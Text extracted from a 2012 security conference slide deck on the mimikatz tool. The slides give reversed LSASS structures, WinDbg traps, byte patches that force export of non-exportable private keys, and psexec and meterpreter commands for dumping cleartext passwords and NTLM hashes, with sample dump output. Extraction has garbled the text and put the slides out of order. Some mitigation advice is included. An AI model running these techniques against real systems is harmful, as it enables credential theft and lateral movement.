07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
